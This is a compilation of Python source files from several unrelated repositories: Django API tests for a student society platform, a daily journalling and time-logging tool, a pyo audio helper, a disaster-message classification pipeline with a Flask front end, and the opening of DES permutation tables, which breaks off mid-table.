url = '/api/society_manage/activity/{}/'.format(self.ar2.pk)
data = {
'title': 'do homework',
'place': 'principal room'
}
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
def test_create_activity_requests(self):
url = '/api/society_manage/activity/'
data = {
'title': 'fudan lecture',
'society': self.society_user.society.id,
'content': '666',
'place': '5106',
'start_time': timezone.now()
}
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 201)
ar3 = ActivityRequest.objects.get(pk=response.data['id'])
self.assertEqual(ar3.status, ActivityRequestStatus.WAITING)
self.assertEqual(ar3.title, 'fudan lecture')
self.assertEqual(ar3.content, '666')
self.assertEqual(ar3.society, self.society)
def test_destroy_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
self.assertIsNone(ActivityRequest.objects.filter(pk=self.ar1.pk).first())
class SocietyManageCreditTests(TestCase):
def setUp(self):
self.society_user1 = self.createUser('su1')
self.society_user2 = self.createUser('su2')
self.society1 = self.createSociety(self.society_user1, members=None)
self.society2 = self.createSociety(self.society_user2, members=None)
self.student_user1 = self.createUser('stu1')
self.student_user2 = self.createUser('stu2')
self.student1 = self.createStudent(self.student_user1)
self.student2 = self.createStudent(self.student_user2)
def test_retrieve(self):
url = '/api/society_manage/credit/'
society1_cd = CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society1.members.set([self.student1, self.student2])
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
params = {
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester')
}
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['year'], timezone.datetime.now().year)
self.assertEqual(res.data['semester'], 1)
self.assertEqual(len(res.data['available_receivers']), 2)
self.assertEqual(res.data['available_receivers'][0]['name'], self.student1.name)
self.assertEqual(res.data['open'], True)
society1_cd.receivers.add(self.student1)
society1_cd.refresh_from_db()
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.data['available_receivers']), 2)
self.assertEqual(len(res.data['receivers']), 1)
society2_cd = CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society2.members.set([self.student1, self.student2])
client.force_authenticate(self.society_user2)
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.data['available_receivers']), 1)
# test 404
params = {
'year': 1111,
'semester': 11
}
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 404)
def test_update(self):
society1_cd = CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society1.members.add(self.student1)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
url = '/api/society_manage/credit/{}/'.format(society1_cd.id)
data = {
'receivers': [
self.student1.id
]
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 200)
society1_cd.refresh_from_db()
self.assertEqual(society1_cd.receivers_count, 1)
self.assertEqual(society1_cd.receivers.first(), self.student1)
data = {
'receiver': []
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 400)
society1_cd.open = False
society1_cd.save()
data = {
'receivers': [
self.student1.id
]
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 406)
class SocietyProfileTests(TestCase):
def setUp(self):
self.society_user1 = self.createUser(
username='101'
)
self.society_user2 = self.createUser(
username='201'
)
self.society1 = self.createSociety(
user=self.society_user1,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.society2 = self.createSociety(
user=self.society_user2,
members=None,
society_id=201,
society_type=SocietyType.SELFRELIANCE
)
def test_retrieve_profile(self):
url = '/api/society_manage/profile/'
client = APIClient(enforce_csrf_checks=True)
# without login
res = client.get(url)
self.assertEqual(res.status_code, 403)
# society not active
client.force_authenticate(self.society_user1)
res = client.get(url)
self.assertEqual(res.status_code, 403)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
res = client.get(url)
self.assertEqual(res.status_code, 200)
print(res.data['id'], self.society1.pk)
print(res.data['society_id'], self.society1.society_id)
def test_update_profile(self):
url1 = '/api/society_manage/profile/{}/'.format(self.society1.pk)
url2 = '/api/society_manage/profile/{}/'.format(self.society2.pk)
client = APIClient(enforce_csrf_checks=True)
data = {
'name': 'test',
'type': SocietyType.SCIENTIFIC,
'status': SocietyStatus.ARCHIVED
}
# without login
res = client.patch(url1, data=data)
self.assertEqual(res.status_code, 403)
# society not active
client.force_authenticate(self.society_user1)
self.assertEqual(res.status_code, 403)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
self.society2.status = SocietyStatus.ACTIVE
self.society2.save()
# modify others' profile
res = client.patch(url2, data=data)
self.society2.refresh_from_db()
self.assertEqual(self.society2.name, 'jeek1')
res = client.patch(url1, data=data)
self.society1.refresh_from_db()
self.assertEqual(res.status_code, 200)
self.assertEqual(self.society1.name, 'test')
self.assertEqual(self.society1.type, SocietyType.HUMANISTIC)
self.assertEqual(self.society1.status, SocietyStatus.ACTIVE)
def test_upload_avatar(self):
url = '/api/society_manage/profile/upload_avatar/'
# use 'rb' to solve encoding issue
original_file = open(os.path.join(TEST_FILE_PATH, 'jeek.jpeg'), 'rb')
cropped_file = open(os.path.join(TEST_FILE_PATH, 'cropped.jpeg'), 'rb')
crop = {
'x': 25,
'y': 25,
'width': 50,
'height': 50
}
data = {
'avatar': original_file,
'crop': json.dumps(crop)
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 202)
self.society1.refresh_from_db()
cropped_img = Image.open(cropped_file)
server_img = Image.open(self.society1.avatar)
diff = ImageChops.difference(cropped_img, server_img)
self.assertIsNone(diff.getbbox())
original_file.close()
cropped_file.close()
```
#### File: StudentPlatform/testing/client.py
```python
from django.test.client import Client as DjangoClient
import json
class Client(DjangoClient):
def _do_req(self, url, data, method, *args, **kwargs):
if method == 'GET':
response = super(Client, self).get(url, data, *args, **kwargs)
elif method == 'POST':
response = super(Client, self).post(url, data, *args, **kwargs)
else:
response = super(Client, self).delete(url, data, *args, **kwargs)
decode = kwargs.get('decode', False)
if decode:
return json.loads(response.content)
return response
def get(self, url, data={}, *args, **kwargs):
return self._do_req(url, data, 'GET', *args, **kwargs)
def post(self, url, data={}, *args, **kwargs):
return self._do_req(url, data, 'POST', *args, **kwargs)
```
#### File: StudentPlatform/testing/testcases.py
```python
from django.test import TestCase as DjangoTestCase
from django.contrib.auth.models import User
from society.constants import SocietyType, SocietyStatus
from testing.client import Client
from student.models import Student
from society.models import Society
from society_bureau.models import SocietyBureau
class TestCase(DjangoTestCase):
client_class = Client
def createUser(self, username):
return User.objects.create_user(username=username, password=username + '<PASSWORD>')
def createStudent(
self,
user,
name='ncjjj',
grade=1,
class_num=1,
qq='123'
):
return Student.objects.create(
user=user,
name=name,
grade=grade,
class_num=class_num,
qq=qq
)
def createSociety(
self,
user,
members=None,
society_id=None,
status=SocietyStatus.WAITING,
society_type=SocietyType.HUMANISTIC,
name='jeek1',
president_name='ncj',
president_class=1,
president_grade=1
):
society = Society.objects.create(
user=user,
society_id=society_id,
president_name=president_name,
president_class=president_class,
president_grade=president_grade,
type=society_type,
name=name,
status=status
)
if members is not None:
society.members.set(members)
return society
def createSocietyBureau(
self,
user,
real_name='qsm',
qq='2333',
email='<EMAIL>',
):
society_bureau = SocietyBureau.objects.create(
user=user,
real_name=real_name,
qq=qq,
email=email
)
return society_bureau
```
|
{
"source": "JEElsner/DailyData",
"score": 3
}
|
#### File: DailyData/io/text.py
```python
from datetime import datetime, timedelta
from os import PathLike
from pathlib import Path
from typing import List
from .timelog_io import TimelogIO
import pandas as pd
class TextIO(TimelogIO):
def __init__(self, act_folder: Path):
self.activity_folder = act_folder
self.act_list_path = self.activity_folder.joinpath('list.txt')
def record_time(self, activity: str, user: str, timestamp: datetime, backdated=False):
if not self.activity_folder.exists():
self.activity_folder.mkdir()
if not self.act_list_path.exists():
open(self.act_list_path, mode='w').close()
with open(self.act_list_path, mode='r+') as act_list:
if (activity + '\n') not in act_list:
raise ValueError('Unknown activity {}'.format(activity))
with open(self.activity_folder.joinpath(timestamp.strftime('%Y-%m') + '.csv'), mode='a') as file:
file.write(','.join([activity, str(timestamp), '\n']))
def get_timestamps(self, earliest: datetime, latest: datetime) -> List:
all = pd.DataFrame(columns=['activity', 'time'])
for csv_path in self.activity_folder.glob('*.csv'):
file_date = datetime.strptime(csv_path.stem, '%Y-%m')
if earliest <= file_date < latest:
with open(csv_path) as file:
df = pd.read_csv(
file, names=['activity', 'time'], usecols=[0, 1])
df['time'] = pd.to_datetime(df['time'])
df.drop(df[df['time'] > latest].index, inplace=True)
df.drop(df[df['time'] < earliest].index, inplace=True)
all = all.append(df, ignore_index=True)
return all
def new_activity(self, activity: str, parent: str, is_alias: bool):
raise NotImplementedError()
```
#### File: DailyData/time_management/config.py
```python
from dataclasses import dataclass, field
from pathlib import Path
from datetime import datetime, timedelta
@dataclass
class TimeManagementConfig:
activity_folder: Path = Path('./data/activities')
list_begin_time: datetime = datetime.min
list_duration: timedelta = timedelta(days=36500)
def __post_init__(self):
self.activity_folder = Path(
self.activity_folder)
if isinstance(self.list_begin_time, str):
self.list_begin_time = datetime.fromisoformat(self.list_begin_time)
if isinstance(self.list_duration, float):
self.list_duration = timedelta(seconds=self.list_duration)
```
#### File: DailyData/tracker/journaller.py
```python
import json
import os
import random as rand
from datetime import date, datetime
from os import path, system
from pathlib import Path as PathObject
from sys import argv
import ConsoleQuestionPrompts as questions
from DailyData.analyzer import parse_docx
from .. import tracker
class Journaller:
def __init__(self, tracker_cfg):
self.cfg: tracker.TrackerConfig = tracker_cfg
# Prepend act_ for 'activity' to each activity question header.
# This is done to reduce the possibility of duplicates and make it more
# clear what those columns represent.
self.activity_questions = {'act_{e}'.format(e=k):
'Did you {activity} today?'.format(
activity=v)
for k, v in self.cfg.activity_questions.items()}
# Add all activity and event columns to the master list of columns
self.columns = self.cfg.columns + \
list(self.activity_questions.keys())
# Check for duplicate column names
if len(set(self.columns)) != len(self.columns):
raise ValueError('Duplicate column names')
# Construct the path to the CSV file that will store today's entry
self.data_file = self.cfg.stats_folder.joinpath(
str(date.today().year) + self.cfg.data_suffix)
# Get the timezone for later recording
self.timezone = datetime.now().astimezone().tzinfo
def record_and_write_to_file(self):
"""
Take the user's input for the day's statistics and record them. Open the
journalling program if specified in the configuration file.
"""
# Verify data file exists, and create it if it doesn't
if not path.exists(self.data_file):
# Verify that parent folder of data file exists, or create it
if not path.exists(self.cfg.stats_folder):
os.makedirs(self.cfg.stats_folder)
# Create data file
with open(self.data_file, 'w') as f:
f.write(self.cfg.delimiter.join(
self.columns) + '\n')
with open(self.data_file, mode='r+') as file:
try:
# Read in the headers to verify they match the data about to be
# recorded.
headers = next(file).strip().split(self.cfg.delimiter)
# Make sure the headers match the data recorded
if headers != self.columns:
raise ValueError(
'File columns do not match recording columns:\nFile: {f}\nExpected: {e}'.format(f=headers, e=self.columns))
except StopIteration:
pass
# Get the user's input about their statistics
entry = self.record()
# Make sure the kind of data recieved from the user matches what is expected
if list(entry.keys()) != self.columns:
raise ValueError(
'Recorded information does not match expected data columns\nRecorded: {r}\nExpected: {e}'.format(r=entry.keys(), e=self.columns))
# Start the journalling program
if self.cfg.open_journal:
time = self.open_journal(entry['journal_day'])
entry['journal_time'] = time.total_seconds()
# Write today's data to the file
file.write(self.cfg.delimiter.join([str(i)
for i in entry.values()]) + '\n')
def record(self):
"""
Ask questions to the user, returning their responses as a dictionary that
maps a key word for the question to the user's response.
Returns
dict with string keys for each question with a coresponding response.
"""
# Create the dictionary storing the responses
entry = {c: None for c in self.columns}
# Greet the user
# Kindness counts :)
print(self.cfg.greeting, self.cfg.name + '!')
# Verify the date, and allow the user to change it
# This is useful if the user is journalling after midnight, and wants the
# data to be recorded for the previous day
prompt = 'You are journalling for the date of ' + \
str(date.today()) + ' is that correct? Press enter or type \'yes\' if it' + \
' is, or enter the correct date in the form yyyy-mm-dd.\n> '
# Custom function to parse the user's response to the date question
def parse_date_response(response: str):
# If the date is correct, the user either responds with yes or inputs
# nothing
if len(response) == 0 or response.lower()[0] == 'y':
return date.today() # The current date is good, return it
else:
# If the current date is not the desired date, parse the user's
# input for the correct date
try:
return date.fromisoformat(response)
except:
# If the passed date was bad, return None so the question is
# asked again
return None
# Sanitization function to ensure properly-formed delimited files
def sanitize(s: str) -> str:
return s.replace(self.cfg.delimiter, '')
# Ask the question about the date
entry['journal_day'] = questions.ask_question(prompt, in_bounds=lambda x: x is not None,
cast=parse_date_response)
# Record the actual date and time of recording, even if it differs from the
# nominal journal date
entry['time'] = datetime.now(self.timezone)
# Ask the user how their day was relative to yesterday. Later it is asked
# how their day was on a fixed, absolute scale. I think this question is
# important however, for data redundancy and validity. Also it can be hard
# to quantify how good a day is on an absolute scale, and its nice to have
# something to reference.
prompt = 'Today was _________ yesterday.'
choices = ['much worse than',
'worse than',
'the same as',
'better than',
'much better than'
]
entry['relative_score'] = questions.option_question(
prompt, choices, range(-2, 3))
# All of these are pretty self explanatory
# Ask the user a question, and record their response in the dictionary
entry['prod_work'] = questions.range_question(
prompt='how much school work did you do today?\n> '
)
entry['prod_house'] = questions.range_question(
prompt='how much house work (cooking, cleaning, etc.) did you do today?\n> '
)
entry['prod_self'] = questions.range_question(
prompt='how much time did you take for yourself?\n> '
)
prompt = 'how stressed were you today?\n> '
entry['stress'] = questions.range_question(prompt)
entry['bothers'] = questions.ask_question(
prompt='What bothered you today?\n> ',
cast=sanitize
)
entry['gratefuls'] = questions.ask_question(
prompt='What are you grateful for today?\n> ',
cast=sanitize
)
prompt = 'how good of a day was today?\n> '
entry['score'] = questions.range_question(prompt)
# Ask the user a subset of several questions and record their responses
entry.update(questions.ask_some(self.activity_questions,
self.cfg.activity_questions_count))
# Allow the user a little more freedom in expressing the quality of their day
prompt = 'Input any keywords for today. For example, things that happened today.\n> '
entry['keywords'] = questions.ask_question(prompt, cast=sanitize)
# Return the user's responses
return entry
def open_journal(self, date: date, create_file=parse_docx.new_doc, header_func=parse_docx.add_header):
"""
Open the user's desired journal program
Arguments
date The current date so to open the corresponding journal file for
the month
Returns
a datetime.timedelta instance representing the amount of time the user
used their journalling program
"""
# Construct the path to the journal file
journal_path = self.cfg.journal_folder.joinpath(
date.strftime('%Y-%m') + self.cfg.journal_suffix)
# Create the file if it does not exist
self.cfg.journal_folder.mkdir(
parents=True, exist_ok=True)
if not path.exists(journal_path):
create_file(journal_path)
# Add a new header
header_func(journal_path, date.strftime('%Y-%m-%d'))
# Record when the user started editing their journal entry
start = datetime.now()
# Open the journal file with the associated program in the OS
system('start /WAIT ' + str(journal_path.absolute()))
# Return the duration of time the user spent editing their journal
return datetime.now() - start
```
#### File: DailyData/tests/test_configuration.py
```python
from pathlib import Path
import unittest
import DailyData
class TestConfiguration(unittest.TestCase):
def test_DailyData_configuration(self):
self.assertIsNotNone(DailyData.master_config)
self.assertIsInstance(DailyData.master_config.configured, bool)
self.assertIsInstance(DailyData.master_config.data_folder, Path)
# self.assertIsInstance(DailyData.master_config.analyzer,
# DailyData.analyzer.Configuration)
# self.assertIsInstance(DailyData.master_config.tracker,
# DailyData.tracker.Configuration)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JEElsner/DataSong",
"score": 3
}
|
#### File: JEElsner/DataSong/audio.py
```python
from pyo import Server, Sine
import time
class AudioManager:
'''
AudioManager class to abstract away interaction with the Python audio
library pyo
'''
def __init__(self):
'''
Start the audio server and a silent tone
'''
self.server = Server(winhost='mme')
self.server.boot().start()
# Silent tone with no amplitude, phase shift, and really quiet (0.1)
self.tone = Sine(0, 0, 0.1)
self.tone.out()
def setFreq(self, freq):
'''
Change the frequency of the tone
'''
self.tone.setFreq(float(freq))
def stop(self):
'''
Stop the audio server
'''
self.server.stop()
def __del__(self):
# Code to make sure the server stops automatically when we stop using
# the audio manager class
self.stop()
def play_freqs(freqs, bpm):
'''
Method that just plays the iterator of frequencies provided at the
specified beats per minute.
'''
freqs = freqs.astype(float)
sec_per_beat = 60 / bpm
s = Server(winhost='mme')
s.boot()
s.start()
a = Sine(float(freqs[0]), 0, 0.1)
a.out()
for f in freqs:
a.setFreq(float(f))
# We really don't have to be precise about how long we're sleeping
# right now
time.sleep(sec_per_beat)
s.stop()
```
|
{
"source": "jeena72/disaster-response-pipeline",
"score": 3
}
|
#### File: disaster-response-pipeline/app/run.py
```python
import json
import plotly
import pandas as pd
import joblib
import nltk
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.base import BaseEstimator, TransformerMixin
from flask import Flask
from flask import render_template, request, jsonify
from plotly.graph_objs import Bar
from sqlalchemy import create_engine
app = Flask(__name__)
def tokenize(text):
"""
Passed string is normalized, lemmatized, and tokenized
Parameters
-----------
text : str
text to be tokenized
Returns
----------
clean_tokens : list
Contains generated tokens
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
"""
This transformer class extract the starting verb of a sentence
"""
def starting_verb(self, text):
sentence_list = nltk.sent_tokenize(text)
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
first_word, first_tag = pos_tags[0]
if first_tag in ['VB', 'VBP'] or first_word == 'RT':
return True
return False
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.starting_verb)
return pd.DataFrame(X_tagged)
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponseData', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
# extract data needed for visuals
# for plot-1
genre_counts = df.groupby('genre').count()['message'].sort_values(ascending=False)
genre_names = list(genre_counts.index)
# for plot-2
labels_data = df[[col for col in df.columns.tolist() if col not in ["id", "message", "original", "genre"]]]
imbalance_df = pd.concat([pd.Series(labels_data.mean(), name="1"), pd.Series(1 - labels_data.mean(), name="0")], axis=1)
imbalance_df.sort_values(by=["1"], inplace=True)
message_categories_list = imbalance_df.index.tolist()
ones_count_normalized = imbalance_df["1"]
zeros_count_normalized = imbalance_df["0"]
# create visuals
graphs = [
{
'data': [
Bar(
x=genre_names,
y=genre_counts,
width=0.5
)
],
'layout': {
'title': 'Distribution of Message Genres',
'yaxis': {
'title': "Count"
},
'xaxis': {
'title': "Genre"
}
}
},
{
'data': [
Bar(
x=ones_count_normalized,
y=message_categories_list,
name="1 - category present",
orientation="h",
width=0.9
),
Bar(
x=zeros_count_normalized,
y=message_categories_list,
name="0 - category absent",
orientation="h",
width=0.9
)
],
'layout': {
'title': 'Data imbalance distribution, Total messages: {}'.format(labels_data.shape[0]),
'yaxis': {
'title': "Message category"
},
'xaxis': {
'title': "Fraction"
},
'barmode': "stack",
'automargin': "False",
'height':650,
'margin':dict(l=160, r=60, t=60, b=55)
}
}
]
# encode plotly graphs in JSON
ids = ["graph-{}".format(i) for i, _ in enumerate(graphs)]
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
# render web page with plotly graphs
return render_template('master.html', ids=ids, graphJSON=graphJSON)
# web page that handles user query and displays model results
@app.route('/go')
def go():
# save user input in query
query = request.args.get('query', '')
# use model to predict classification for query
classification_labels = model.predict([query])[0]
classification_results = sorted(list(zip(df.columns[4:], classification_labels)), key=lambda x: x[1], reverse=True)
# This will render the go.html Please see that file.
return render_template(
'go.html',
query=query,
classification_result=classification_results
)
def main():
app.run(host='127.0.0.1', port=3001, debug=True)
if __name__ == '__main__':
main()
```
#### File: disaster-response-pipeline/models/train_classifier.py
```python
import sys
import pandas as pd
import numpy as np
import nltk
from joblib import dump
from sqlalchemy import create_engine
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import AdaBoostClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
"""
Load and generate datasets for fitting along with message categories list
Parameters
-----------
database_filepath : str
SQLite database file path
Returns
----------
X : DataFrame
Contains messages for generating features
Y : DataFrame
Contains binary labels for various message categories
category_names : list
List of different message categories
"""
engine = create_engine('sqlite:///' + database_filepath)
df = pd.read_sql_table("DisasterResponseData", con=engine)
X = df["message"]
Y = df[[col for col in df.columns.tolist() if col not in ["id", "message", "original", "genre"]]]
category_names = Y.columns.tolist()
return X, Y, category_names
def tokenize(text):
"""
Passed string is normalized, lemmatized, and tokenized
Parameters
-----------
text : str
text to be tokenized
Returns
----------
clean_tokens : list
Contains generated tokens
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
"""
This transformer class extract the starting verb of a sentence
"""
def starting_verb(self, text):
sentence_list = nltk.sent_tokenize(text)
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
first_word, first_tag = pos_tags[0]
if first_tag in ['VB', 'VBP'] or first_word == 'RT':
return True
return False
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.starting_verb)
return pd.DataFrame(X_tagged)
def build_model(useGridSearch=False):
"""
Creates scikit Pipeline object for processing text messages and fitting a classifier.
Parameters
-----------
useGridSearch: bool
If grid search be used for model training
Returns
----------
pipeline : Pipeline
Pipeline object
"""
pipeline = Pipeline([
("features", FeatureUnion([
('text_pipeline', Pipeline([
('count_vectorizer', CountVectorizer(tokenizer=tokenize)),
('scaler', StandardScaler(with_mean=False))
])),
('tfidf_transformer', TfidfVectorizer()),
('starting_verb_extr', StartingVerbExtractor())
])),
("clf", MultiOutputClassifier(AdaBoostClassifier()))
])
if useGridSearch:
parameters = {
'features__text_pipeline__count_vectorizer__max_df': (0.5, 1.0),
'features__tfidf_transformer__use_idf': (True, False),
'features__transformer_weights': (
{'text_pipeline': 1, 'tfidf_transformer': 1, 'starting_verb': 1},
{'text_pipeline': 0.5, 'tfidf_transformer': 1, 'starting_verb': 0.5},
)
}
cv = GridSearchCV(pipeline, param_grid=parameters, cv=3, verbose=2.1)
return cv
return pipeline
def evaluate_model(model, X_test, Y_test, category_names):
"""
Method applies scikit pipeline to test set and prints the model performance (accuracy and f1score)
Parameters
-----------
model : Pipeline
fit pipeline
X_test : ndarray
test features
Y_test : ndarray
test labels
category_names : list
List of different message categories
Returns
----------
None
"""
Y_pred = model.predict(X_test)
print(classification_report(Y_test, Y_pred, target_names=category_names))
def save_model(model, model_filepath):
"""
Save trained model
Parameters
-----------
model : Pipeline
fit pipeline
model_filepath : str
path with dump format
Returns
----------
None
"""
dump(model, "{}".format(model_filepath))
def main():
"""
Runner function
This function:
1) Extract data from SQLite db
2) Train ML model on training set
3) Estimate model performance on test set
4) Save trained model
"""
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X.values, Y.values, test_size=0.2, random_state=42)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main()
```
|
{
"source": "jeenalee/sklearn_pmml",
"score": 3
}
|
#### File: sklearn_pmml/extensions/linear_regression.py
```python
from sklearn.linear_model import LinearRegression
from bs4 import BeautifulSoup
import numpy
def from_pmml(self, pmml):
"""Returns a model with the intercept and coefficients represented in PMML file."""
model = self()
# Reads the input PMML file with BeautifulSoup.
with open(pmml, "r") as f:
lm_soup = BeautifulSoup(f, "xml")
if not lm_soup.RegressionTable:
raise ValueError("RegressionTable not found in the input PMML file.")
else:
##### DO I WANT TO PULL THIS OUT AS ITS OWN FUNCTION? #####
# Pulls out intercept from the PMML file and assigns it to the
# model. If the intercept does not exist, assign it to zero.
intercept = 0
if "intercept" in lm_soup.RegressionTable.attrs:
intercept = lm_soup.RegressionTable['intercept']
model.intercept_ = float(intercept)
# Pulls out coefficients from the PMML file, and assigns them
# to the model.
if not lm_soup.find_all('NumericPredictor'):
raise ValueError("NumericPredictor not found in the input PMML file.")
else:
coefs = []
numeric_predictors = lm_soup.find_all('NumericPredictor')
for i in numeric_predictors:
i_coef = float(i['coefficient'])
coefs.append(i_coef)
model.coef_ = numpy.array(coefs)
return model
# TODO: check input data's X order and rearrange the array
LinearRegression.from_pmml = classmethod(from_pmml)
```
|
{
"source": "jeenn85/DES_encryptor",
"score": 2
}
|
#### File: jeenn85/DES_encryptor/des_algorithm.py
```python
PI = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# Initial key permutation matrix
CP_1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# Shifted key permutation matrix to get Ki+1
CP_2 = [14, 17, 11, 24, 1, 5, 3, 28,
15, 6, 21, 10, 23, 19, 12, 4,
26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40,
51, 45, 33, 48, 44, 49, 39, 56,
34, 53, 46, 42, 50, 36, 29, 32]
# Expanded matrix (48bits after expansion) XORed with Ki
E = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# S-BOXES matrix
S_BOXES = [
[[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
[0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
[4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
[15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],
],
[[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10],
[3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5],
[0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15],
[13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9],
],
[[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8],
[13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1],
[13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7],
[1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12],
],
[[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15],
[13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9],
[10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4],
[3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14],
],
[[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
[14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
[4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
[11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3],
],
[[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11],
[10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8],
